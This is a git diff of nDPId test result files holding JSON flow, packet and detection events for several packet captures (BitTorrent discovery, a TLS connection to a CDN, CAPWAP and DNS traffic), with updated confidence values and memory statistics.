00596{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bt_search.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1430752225251,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":161,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":161,"pkt_l4_len":127,"thread_ts_msec":1430752225251,"pkt":"AQBeQJiPABZEH1lmCABFAACTaOEAAP8RCRrAqABm78CYjxpzGnMAf8gHQlQtU0VBUkNIICogSFRUUC8xLjENCkhvc3Q6IDIzOS4xOTIuMTUyLjE0Mzo2NzcxDQpQb3J0OiA2MTE5Nw0KSW5mb2hhc2g6IEVENEYxMDg1RTg4NUY5OEY5QTY5QjcwRUU4OUVCOTg4QjhGRDkxMTUNCg0KDQo="} -00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bt_search.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430752225251,"flow_last_seen":1430752225251,"flow_idle_time":200000,"flow_min_l4_payload_len":119,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1430752225251,"l3_proto":"ip4","src_ip":"192.168.0.102","dst_ip":"239.192.152.143","src_port":6771,"dst_port":6771,"l4_proto":"udp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":""}} +00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bt_search.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430752225251,"flow_last_seen":1430752225251,"flow_idle_time":200000,"flow_min_l4_payload_len":119,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1430752225251,"l3_proto":"ip4","src_ip":"192.168.0.102","dst_ip":"239.192.152.143","src_port":6771,"dst_port":6771,"l4_proto":"udp","ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":""}} 00597{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bt_search.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1430752525284,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":161,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":161,"pkt_l4_len":127,"thread_ts_msec":1430752525284,"pkt":"AQBeQJiPABZEH1lmCABFAACTCiwAAP8RZ8\/AqABm78CYjxpzGnMAf8gHQlQtU0VBUkNIICogSFRUUC8xLjENCkhvc3Q6IDIzOS4xOTIuMTUyLjE0Mzo2NzcxDQpQb3J0OiA2MTE5Nw0KSW5mb2hhc2g6IEVENEYxMDg1RTg4NUY5OEY5QTY5QjcwRUU4OUVCOTg4QjhGRDkxMTUNCg0KDQo="} 00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"bt_search.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430752225251,"flow_last_seen":1430752525284,"flow_idle_time":200000,"flow_min_l4_payload_len":119,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1430752525284,"l3_proto":"ip4","src_ip":"192.168.0.102","dst_ip":"239.192.152.143","src_port":6771,"dst_port":6771,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"bt_search.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":238,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1430752525284} @@ -14,9 +14,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6131633 bytes -~~ total memory freed........: 6131633 bytes -~~ total allocations/frees...: 118117/118117 +~~ total memory allocated....: 6265267 bytes +~~ total memory freed........: 6265267 bytes +~~ total allocations/frees...: 120879/120879 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 692 chars diff --git a/test/results/cachefly.pcapng.out b/test/results/cachefly.pcapng.out new file mode 100644 index 000000000..270f2c3d7 --- /dev/null +++ b/test/results/cachefly.pcapng.out @@ -0,0 +1,26 @@ +00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"cachefly.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"cachefly.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1639053996915} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"cachefly.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639053996915,"flow_last_seen":1639053996915,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639053996915,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":43766,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"cachefly.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1639053996915,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1639053996915,"pkt":"AAAAAAAAAAEAzkGkCABFAAA8AABAADgGbggKCgoBwKgAAQG7qvYcGrARC\/df8aASOJAXeAAAAgQFtAQCCAr4WKdZ8aCtGAEDAwk="} +01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"cachefly.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1639053997244,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1639053997244,"pkt":"AAAAAAAAAAEAzkGkCABFAAI5KtdAAD8GOjTAqAABCgoKAar2AbsL91\/xHBqwEoAYAECN7gAAAQEICvGgrmz4WKdZFgMBAgABAAH8AwN5I1ozU7xInxtJozbyruWCcUxU4dIiuEr772yEdl+IjiA8lzzThjK9JFGzvzmsOf5jh+xiqEIzY+\/b\/bu2q\/rhKgAgysoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTKioAAAAAABcAFQAAEmFwcHR2LmNhY2hlZmx5Lm5ldAAXAAD\/AQABAAAKAAoACBoaAB0AFwAYAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAANABIAEAQDCAQEAQUDCAUFAQgGBgEAEgAAADMAKwApGhoAAQAAHQAgnPDvY\/VXlPM6JRGRsi41pgbweEr23XZr7mS8KeaUbX0ALQACAQEAKwALCjo6AwQDAwMCAwEAGwADAgACRGkABQADAmgyiooAAQAAFQDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00899{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"cachefly.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1639053996915,"flow_last_seen":1639053997244,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1639053997244,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":43766,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apptv.cachefly.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02281{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"cachefly.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1639053997267,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1414,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1414,"pkt_l4_len":1380,"thread_ts_msec":1639053997267,"pkt":"AAAAAAAAAAEAzkGkCABFAAV41QdAADgGk8QKCgoBwKgAAQG7qvYcGrASC\/dh9oAQAB9MhQAAAQEICvhYqLjxoK5sFgMDAEYCAABCAwMckji4QqFlZ8wxA4wqX71jTFy6Bbx3Tac4JpUf64Yh9QDALwAAGv8BAAEAAAsABAMAAQIAIwAAABAABQADAmgyFgMDEs8LABLLABLIAAsKMIILBjCCCe6gAwIBAgIME2NTBK0T7j5OXLNwMA0GCSqGSIb3DQEBCwUAMFAxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9iYWxTaWduIG52LXNhMSYwJAYDVQQDEx1HbG9iYWxTaWduIFJTQSBPViBTU0wgQ0EgMjAxODAeFw0yMTEwMTgyMDIxMDNaFw0yMjExMTkyMDIxMDNaMGgxCzAJBgNVBAYTAlVTMREwDwYDVQQIEwhJbGxpbm9pczEQMA4GA1UEBxMHQ2hpY2FnbzEbMBkGA1UEChMSQ2FjaGVuZXR3b3JrcywgTExDMRcwFQYDVQQDDA4qLmNhY2hlZmx5Lm5ldDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAL\/+fRCDTZEScrfWCMFyaixKeqElAO7ykgeSwfvJjJ0wnRMXDhl9Jl08jKWm\/d3Hktb+0la4oTxnWOXZAHkeMPMd8z5IEjNstMoXVnzzvYTEc4hes6PN3Tko5DyTkpvaiHk24ljRERvEWhRYaw4RnKrT9b+zSwlZOueaejMtqkfNRXDPSR1x3Jl2oQbiXO5T+fqoY+sZN6tOhj6mQW65LLPhC4vk+E4JPhFb1yN\/vHAl5Nki2qqUNydYyxklH4FNUrCnzcInO8MG4k4UvzfLoF5IOdgByO3cVOhvWff2S\/Iy1d3+tC7BZ3FL7Yj\/WhfXV+SI\/dS2PepELisfoFHyq5sCAwEAAaOCB8YwggfCMA4GA1UdDwEB\/wQEAwIFoDCBjgYIKwYBBQUHAQEEgYEwfzBEBggrBgEFBQcwAoY4aHR0cDovL3NlY3VyZS5nbG9iYWxzaWduLmNvbS9jYWNlcnQvZ3Nyc2FvdnNzbGNhMjAxOC5jcnQwNwYIKwYBBQUHMAGGK2h0dHA6Ly9vY3NwLmdsb2JhbHNpZ24uY29tL2dzcnNhb3Zzc2xjYTIwMTgwVgYDVR0gBE8wTTBBBgkrBgEEAaAyARQwNDAyBggrBgEFBQcCARYmaHR0cHM6Ly93d3cuZ2xvYmFsc2lnbi5jb20vcmVwb3NpdG9yeS8wCAYGZ4EMAQICMAkGA1UdEwQCMAAwggTYBgNVHREEggTPMIIEy4IOKi5jYWNoZWZseS5uZXSCEGdldC50YXhjeWNsZS5jb22CDWJvb2tzMjR4Ny5jb22CGHNpdGVjbG9zZWQub3ZlcmRyaXZlLmNvbYIRYy5hZHZlbnR1cmVydi5uZXSCFmRvd25sb2FkLmFjb3VzdGljYS5jb22CE2Nkbi5hcnN0ZWNobmljYS5uZXSCEW9jcC5jc2NnbG9iYWwuY29tghRjZG4tdy5nZXR0cmFmZmljLmNvbYIbY2YuY2RuLnBvdW5kc3RvcG9ja2V0LmNvLnVrghVjZi5jZG4uY2FzaG5ldHVzYS5jb22CFmNmLmNkbi5xdWlja3F1aWQuY28udWuCFmRvd25sb2Fkcy5vbmNlbnRlci5jb22CE2NhY2hlLmdyZWVuMTAyMC5jb22CFXNvZnR3YXJlLm9udGhlaHViLmNvbYIQY29kZS5tdXJkb29nLmNvbYIQaW1nLnRyYWRlcHViLmNvbYIUaW1hZ2VzLm92ZXJkcml2ZS5jb22CF3N0YXRpYy5yZWFkeWZsb3dlcnMuY29tghVjZG4ucmljaA=="} +00955{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"cachefly.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1639053996915,"flow_last_seen":1639053997267,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":1865,"flow_avg_l4_payload_len":621,"midstream":0,"thread_ts_msec":1639053997267,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":43766,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apptv.cachefly.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02393{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"cachefly.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1639053996915,"flow_last_seen":1639053997267,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":5759,"flow_avg_l4_payload_len":959,"midstream":0,"thread_ts_msec":1639053997267,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":43766,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cachefly","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apptv.cachefly.net","server_names":"*.cachefly.net,get.taxcycle.com,books24x7.com,siteclosed.overdrive.com,c.adventurerv.net,download.acoustica.com,cdn.arstechnica.net,ocp.cscglobal.com,cdn-w.gettraffic.com,cf.cdn.poundstopocket.co.uk,cf.cdn.cashnetusa.com,cf.cdn.quickquid.co.uk,downloads.oncenter.com,cache.green1020.com,software.onthehub.com,code.murdoog.com,img.tradepub.com,images.overdrive.com,static.readyflowers.com,cdn.richrelevance.com,qastatic.richrelevance.net,cache.agilebits.com,cachefly.alfredapp.com,download.fosshub.com,cdncontent.skillsoftcompliance.com,cdnlibrary.qual.skillport.com,cdnlibrary.skillport.com,cdnlibrary.skillport.eu,cdnlibrary-otls.skillport.com,st-cdn01.net-perform.com,assets.yandycdn.com,cdn.nexternal.com,www.workcred.org,img.sedoparking.com,www.standardsboostbusiness.org,cdn.sparklingsociety.net,smartupdate1.centralpointnow.com,cdn.edgeuno.com,downloads.pdf-xchange.com,cachefly.kinematics.com,cachefly.discoverinspire.com,static.volotea.com,*.cachefly.com,*.pluralsight.com,*.cdn.overdrive.com,*.contentreserve.com,*.listen.overdrivechina.cn,*.od-cdn.com,*.overdrivechina.cn,*.read.overdrivechina.cn,*.rbxcdn.com,*.books24x7.com,*.ansi.org,*.livee.com,cachefly.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign RSA OV SSL CA 2018","subjectDN":"C=US, ST=Illinois, L=Chicago, O=Cachenetworks, LLC, CN=*.cachefly.net","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"14:84:4F:1F:E8:A1:78:8A:12:27:36:B8:42:AB:42:52:FC:3B:C4:BA"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"cachefly.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1639053996915,"flow_last_seen":1639053997267,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":5759,"flow_avg_l4_payload_len":959,"midstream":0,"thread_ts_msec":1639053997267,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":43766,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cachefly","breed":"Acceptable","category":"Cloud"}} +00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"cachefly.pcapng","alias":"nDPId-test","packets-captured":6,"packets-processed":6,"total-skipped-flows":0,"total-l4-payload-len":5759,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1639053997267} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 6/6 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 5759 bytes +~~ total detected protocols..: 1 +~~ total active/idle flows...: 1/1 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6050694 bytes +~~ total memory freed........: 6050694 bytes +~~ total allocations/frees...: 120945/120945 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 466 chars +~~ json string max len.......: 2398 chars +~~ json string avg len.......: 1404 chars diff --git a/test/results/capwap.pcap.out b/test/results/capwap.pcap.out index 7393f7c8f..621adcb60 100644 --- a/test/results/capwap.pcap.out +++ b/test/results/capwap.pcap.out @@ -2,10 +2,10 @@ 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"capwap.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1422328949167} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"capwap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422328949167,"flow_last_seen":1422328949167,"flow_idle_time":200000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1422328949167,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12379,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"capwap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1422328949167,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1422328949167,"pkt":"uDhh8wWsJOmzR64gCABFwABdANlAAH8RZJPAqAoJwKgKChR+MFsASQAAAQAAABX+\/wABAAAAAAABADCRUl3gOBqBz\/u8XElQaHVuhYA4Oyehwv8gEXQ+BVAOU1L6bxnlZCgpb3mFtLC\/ZhI="} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"capwap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422328949167,"flow_last_seen":1422328949167,"flow_idle_time":200000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1422328949167,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12379,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"capwap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422328949167,"flow_last_seen":1422328949167,"flow_idle_time":200000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1422328949167,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12379,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"capwap.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422328963915,"flow_last_seen":1422328963915,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1422328963915,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":49259,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"capwap.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1422328963915,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1422328963915,"pkt":"\/\/\/\/\/\/\/\/uDhh8wWsCABFAABFAAEAAP8R8PTAqAoK\/\/\/\/\/8BrADUAMQAA9LUBAAABAAAAAAAAF0NJU0NPLUNBUFdBUC1DT05UUk9MTEVSAAABAAE="} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"capwap.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422328963915,"flow_last_seen":1422328963915,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1422328963915,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":49259,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"cisco-capwap-controller","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"capwap.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422328963915,"flow_last_seen":1422328963915,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1422328963915,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":49259,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"cisco-capwap-controller","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"capwap.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1422328966914,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1422328966914,"pkt":"\/\/\/\/\/\/\/\/uDhh8wWsCABFAABFAAIAAP8R8PPAqAoK\/\/\/\/\/8BrADUAMQAA9LUBAAABAAAAAAAAF0NJU0NPLUNBUFdBUC1DT05UUk9MTEVSAAABAAE="} 00181{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":4,"source":"capwap.pcap","alias":"nDPId-test","layer_type":351,"global_ts_msec":1422328970067} 00756{"packet_event_id":1,"packet_event_name":"packet","packet_id":4,"source":"capwap.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":365,"pkt_type":351,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":365,"pkt_l4_len":0,"thread_ts_msec":1422328966914,"pkt":"AQAMzMzMuDhh8wWsAV+qqgMAAAwgAAK0db0AAQAUQVBiODM4LjYxZjMuMDVhYwAFAPJDaXNjbyBJT1MgU29mdHdhcmUsIEMyNjAwIFNvZnR3YXJlIChBUDNHMi1LOVc4LU0pLCBWZXJzaW9uIDE1LjIoNClKQTEsIFJFTEVBU0UgU09GVFdBUkUgKGZjMikKVGVjaG5pY2FsIFN1cHBvcnQ6IGh0dHA6Ly93d3cuY2lzY28uY29tL3RlY2hzdXBwb3J0CkNvcHlyaWdodCAoYykgMTk4Ni0yMDEzIGJ5IENpc2NvIFN5c3RlbXMsIEluYy4KQ29tcGlsZWQgVHVlIDMwLUp1bC0xMyAyMjo1NyBieSBwcm9kX3JlbF90ZWFtAAYAG2Npc2NvIEFJUi1DQVAyNjAySS1RLUs5AAIAEQAAAAEBAcwABMCoCgoAAwAUR2lnYWJpdEV0aGVybmV0MAAEAAgAAAADAAsABQE="} @@ -21,16 +21,16 @@ 00801{"packet_event_id":1,"packet_event_name":"packet","packet_id":12,"source":"capwap.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":397,"pkt_type":383,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":397,"pkt_l4_len":0,"thread_ts_msec":1422328966914,"pkt":"AQAMzMzMuDhh8wWsAX+qqgMAAAwgAAK0cl0AAQAUQVBiODM4LjYxZjMuMDVhYwAFAPJDaXNjbyBJT1MgU29mdHdhcmUsIEMyNjAwIFNvZnR3YXJlIChBUDNHMi1LOVc4LU0pLCBWZXJzaW9uIDE1LjIoNClKQTEsIFJFTEVBU0UgU09GVFdBUkUgKGZjMikKVGVjaG5pY2FsIFN1cHBvcnQ6IGh0dHA6Ly93d3cuY2lzY28uY29tL3RlY2hzdXBwb3J0CkNvcHlyaWdodCAoYykgMTk4Ni0yMDEzIGJ5IENpc2NvIFN5c3RlbXMsIEluYy4KQ29tcGlsZWQgVHVlIDMwLUp1bC0xMyAyMjo1NyBieSBwcm9kX3JlbF90ZWFtAAYAG2Npc2NvIEFJUi1DQVAyNjAySS1RLUs5AAIAEQAAAAEBAcwABMCoCgoAAwAWR2lnYWJpdEV0aGVybmV0MC4xAAQACAAAAAMACwAFAQAPAAggAAAAABAABjLIABkAEKSNAAAAADwoAAAyyA=="} 